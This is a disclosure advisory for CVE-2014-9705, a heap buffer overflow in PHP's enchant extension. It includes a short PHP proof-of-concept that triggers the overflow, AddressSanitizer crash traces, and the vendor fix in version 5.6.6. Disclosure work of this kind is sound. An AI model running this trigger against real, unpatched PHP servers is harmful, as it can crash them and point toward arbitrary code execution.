Heap Buffer Overflow in PHP
| Advisory ID: | HTB23252 |
| Product: | PHP |
| Vendor: | PHP |
| Vulnerable Versions: | 5.6.5 and probably prior |
| Tested Version: | 5.6.5 |
| Advisory Publication: | December 5, 2014 [without technical details] |
| Vendor Notification: | December 5, 2014 |
| Vendor Fix: | February 19, 2015 |
| Public Disclosure: | December 5, 2014 |
| Latest Update: | March 15, 2015 |
| Vulnerability Type: | Buffer Errors [CWE-119] |
| CVE Reference: | CVE-2014-9705 |
| Risk Level: | High |
|  |
| CVSSv2 Base Score: | 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) |
| Solution Status: | Fixed by Vendor |
| Discovered and Provided: | High-Tech Bridge Security Research Lab |
|
Advisory Details: |
High-Tech Bridge Security Research Lab discovered a remote heap buffer overflow vulnerability in PHP, which can be exploited to cause a denial of service or execute arbitrary code on the target system.
1) Heap Buffer Overflow in PHP: CVE-2014-9705
The vulnerability resides within the enchant_broker_request_dict() function. A remote attacker can overwrite 4 bytes of heap buffer and cause a denial of service or execute arbitrary code on the target system.
PoC
========
<?php
$tag = 'en_US';
$r = enchant_broker_init();
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, 'one', $suggs);
$d = enchant_broker_request_dict($r, $tag);
?>
Result:
========
[Fri Dec 5 13:32:59 2014] Script: '/home/symeon/Desktop/dict.php'
---------------------------------------
/h ome/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
Beginning: OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
Start: OK
End: Overflown (magic=0x00000034 instead of 0xAF9A0F68)
At least 4 bytes overflown
---------------------------------------
======================== =========================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
#0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
#1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
#2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
#3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
#4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
#5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
#6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
#7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
#8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
#9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
#10 0x807d080 in _start ??:?
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_allocator2.cc:216 "((id)) != (0)" (0x0, 0x0)
#0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
#1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
#2 0xb616ef1e in ?? ??:0
#3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
#4 0xb6184b7f in __asan_report_error ??:?
#5 0xb617db2e in __asan_report_store4 ??:?
#6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
#7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
#8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
#9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
#10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
#11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
#12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
#13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
#14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
#15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287 |
- GDPR & PCI DSS Test
- Website CMS Security Test
- CSP & HTTP Headers Check
- WordPress & Drupal Scanning
Try For Free
Solution: |
Install the latest version 5.6.6.
http://php.net/archive/2015.php#id2015-02-19-2 |
| |
References: |
[1] High-Tech Bridge Advisory HTB23252 - https://www.immuniweb.com/advisory/HTB23252 - Heap Buffer Overflow in PHP.
[2] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - Leveraging the power of machine-learning and genius of human brain to deliver the most advanced web application security and penetration testing.
[5] ImmuniWeb® SSLScan - Test your servers for security and compliance with PCI DSS, HIPAA and NIST. |
|
Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
